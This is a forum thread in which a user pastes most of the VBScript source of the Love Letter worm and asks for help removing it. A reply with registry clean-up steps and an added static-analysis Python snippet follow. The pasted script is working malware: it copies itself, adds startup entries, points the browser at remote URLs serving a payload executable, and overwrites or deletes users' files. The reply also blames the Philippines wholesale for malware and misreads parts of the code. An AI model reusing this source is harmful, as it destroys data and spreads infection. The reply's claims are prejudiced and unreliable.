How to reverse engineer this code?

Ok so I was on this website, and they had this neat script. Well, I copied and pasted it into notepad, and tried to save it as a .txt file, you know, just to have. Well, it saved, but I couldn’t find it, and now my computer is screwed. Yes, it was stupid of me, but now nothing will get rid of it. Here is the code, I hope someone can make something out of it. Thanks in advance.
The code is in between StartCode and EndCode. If I wasn’t clear, I want to know how to get rid of this code, because no virus scan will get rid of it.
StartCode
xxx not porn -loveletter(vbe)
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
Manila,Philippines
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=”"
ctr=0
Set fso = CreateObject(“Scripting.FileSystemObject”)
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject(“WScript.Shell”)
rr=wscr.RegRead(“HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout”)
if (rr>=1) then
wscr.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout”,0,”REG_DWORD”
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&”\MSKernel32.vbs”)
c.Copy(dirwin&”\Win32DLL.vbs”)
c.Copy(dirsystem&”\LOVE-LETTER-FOR-YOU.TXT.vbs”)
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
“,dirsystem&”\MSKernel32.vbs”
regcreate
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL”,dirwin&”\Win32DLL.vbs”
downread=”"
downread=regget(“HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory”)
if (downread=”") then
downread=”c:”
end if
if (fileexist(dirsystem&”\WinFAT32.exe”)=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page”,”http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe”
elseif num = 2 then
regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page”,”http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe”
elseif num = 3 then
regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page”,”http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe”
elseif num = 4 then
regcreate “HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page”,”http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
.exe”
end if
end if
if (fileexist(downread&”\WIN-BUGSFIX.exe”)=0) then
regcreate
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
X”,downread&”\WIN-BUGSFIX.exe”
regcreate “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page”,”about:blank”
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&”")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext=”vbs”) or (ext=”vbe”) then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext=”js”) or (ext=”jse”) or (ext=”css”) or (ext=”wsh”) or (ext=”sct”)
or (ext=”hta”) then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&”"&bname&”.vbs”)
fso.DeleteFile(f1.path)
elseif(ext=”jpg”) or (ext=”jpeg”) then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&”.vbs”)
fso.DeleteFile(f1.path)
elseif(ext=”mp3″) or (ext=”mp2″) then
set mp3=fso.CreateTextFile(f1.path&”.vbs”)
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s=”mirc32.exe”) or (s=”mlink32.exe”) or (s=”mirc.ini”) or
(s=”script.ini”) or (s=”mirc.hlp”) then
set scriptini=fso.CreateTextFile(folderspec&”\script.ini”)
scriptini.WriteLine “[script]”
scriptini.WriteLine “;mIRC Script”
scriptini.WriteLine “; Please dont edit this script… mIRC will corrupt,
if mIRC will”
scriptini.WriteLine ” corrupt… WINDOWS will affect and will not run
correctly. thanks”
scriptini.WriteLine “;”
scriptini.WriteLine “;Khaled Mardam-Bey”
scriptini.WriteL
I’m scared of the registry editor, it’s so intimidating, what if I delete something that’ll screw my computer up even more than before? The dll file looks rather important, but I don’t know what I’m doing. The pages, I believe, make pop-ups, so you’d type something in Google, and something would pop up every time. Really annoying. And something called infosteeler was caught by my virus protection, and Windows Defender. Hmmm…

  1. Your first mistake was saving a script from the Philippines. This is where the majority of malware comes from.

    This script is written in Visual Basic Script… a common trait of viruses from the Philippines… they’re all written in relatively simple languages like batch and VBS.

    I like the trademark AWFUL coding…

    It looks like… a re-engineered version of the love letter virus.

    Here’s what it looks like it’s doing (I’m not a VBS programmer but I can understand most of it):

    It creates the following registry keys:

    “HKEY_CURRENT_USER\Software\Microsoft…
    Host\Settings\Timeout”,0,”REG_DWORD”

    “HKEY_LOCAL_MACHINE\Software\Microsoft…
    “,dirsystem&”\MSKernel32.vbs”

    “HKEY_LOCAL_MACHINE\Software\Microsoft…
    n32DLL”,dirwin&”\Win32DLL.vbs”

    Looks like it runs itself on startup or something. These keys are incomplete so I can’t tell…

    It creates these registry keys:

    HKCU\Software\Microsoft\Internet Explorer\Main\Start
    Page”,”http://www.skyinet.net/~young1s…
    w6587345gvsdf7679njbvYT/WIN-BUGSFIX.ex… Explorer\Main\Start
    Page”,”http://www.skyinet.net/~angelca…

    They, I believe, block you from going to those websites, or change your IE homepage to one of them.

    Then makes this registry key:
    “HKEY_CURRENT_USER\Software\Microsoft… Scripting
    Host\Settings\Timeout”,0,”REG_DWORD”

    It sends itself to a bunch of people…

    Then tells you that if you edit it, you will corrupt Windows, with awful English of course.

    Click start (and run if you have XP) and type in “regedit”.
    Navigate to HKEY_LOCAL_MACHINE, then to SOFTWARE, then MICROSOFT, then WINDOWS, then CURRENTVERSION, then RUN, then delete the key MSKERNEL32

    Then find: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
    and delete Win32DLL

    Then find: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    and delete WIN-BUGSFIX

    Then find: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    and delete WinFAT32=WinFAT32.EXE

    That should be it.

    It’s not a real .dll, that’s the point of this. Just delete what I said, it will be fine.
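The registry keys in the paste look incomplete because the statements were hard-wrapped and the quotes were converted to typographic ones. The following added example (not part of the original posts or of the pasted script) recovers the full autorun values and dropped file names by reading the text only, never executing it. The names `rejoin`, `extract_indicators` and `WRAP_COL`, and the 76-column wrap heuristic, are assumptions made for this illustration.

```python
import re

# Constructed sample: lines copied from the script pasted above, keeping the
# typographic quotes and 76-column hard wraps introduced by the forum post.
SAMPLE = r"""
wscr.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout”,0,”REG_DWORD”
c.Copy(dirsystem&”\MSKernel32.vbs”)
c.Copy(dirwin&”\Win32DLL.vbs”)
regcreate
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
“,dirsystem&”\MSKernel32.vbs”
regcreate
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL”,dirwin&”\Win32DLL.vbs”
"""

WRAP_COL = 76  # assumption: a line this long was cut mid-token, a shorter one at a space
AUTORUN = re.compile(r"\\CurrentVersion\\Run(Services|Once)?\\[^\\]+$", re.I)
REG_CALL = re.compile(r'(?:regcreate|\.RegWrite)\s*\(?\s*"([^"]+)"\s*,\s*(.+)', re.I)
COPY_CALL = re.compile(r'\.Copy\(\s*(\w+)\s*&\s*"\\([^"]+)"', re.I)

def rejoin(text):
    """Normalise typographic quotes and merge statements wrapped across lines."""
    out, buf = [], ""
    for line in re.sub("[“”″]", '"', text).splitlines():
        buf += line
        # Odd quote count: a string literal is still open. Bare "regcreate":
        # its arguments were pushed onto the next line.
        if buf.count('"') % 2 or buf.strip().lower() == "regcreate":
            buf += "" if len(line) >= WRAP_COL else " "
            continue
        if buf.strip():
            out.append(buf.strip())
        buf = ""
    return out

def extract_indicators(text):
    """Statically list registry writes (flagging autoruns) and file copies."""
    reg_writes, copies = [], []
    for stmt in rejoin(text):
        m = REG_CALL.search(stmt)
        if m:
            reg_writes.append((m.group(1), m.group(2), bool(AUTORUN.search(m.group(1)))))
        m = COPY_CALL.search(stmt)
        if m:
            copies.append((m.group(1), m.group(2)))
    return reg_writes, copies
```

Each registry tuple is (value path, data expression, is-autorun); the entries flagged `True` are the `Run` and `RunServices` values that the removal steps above delete.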
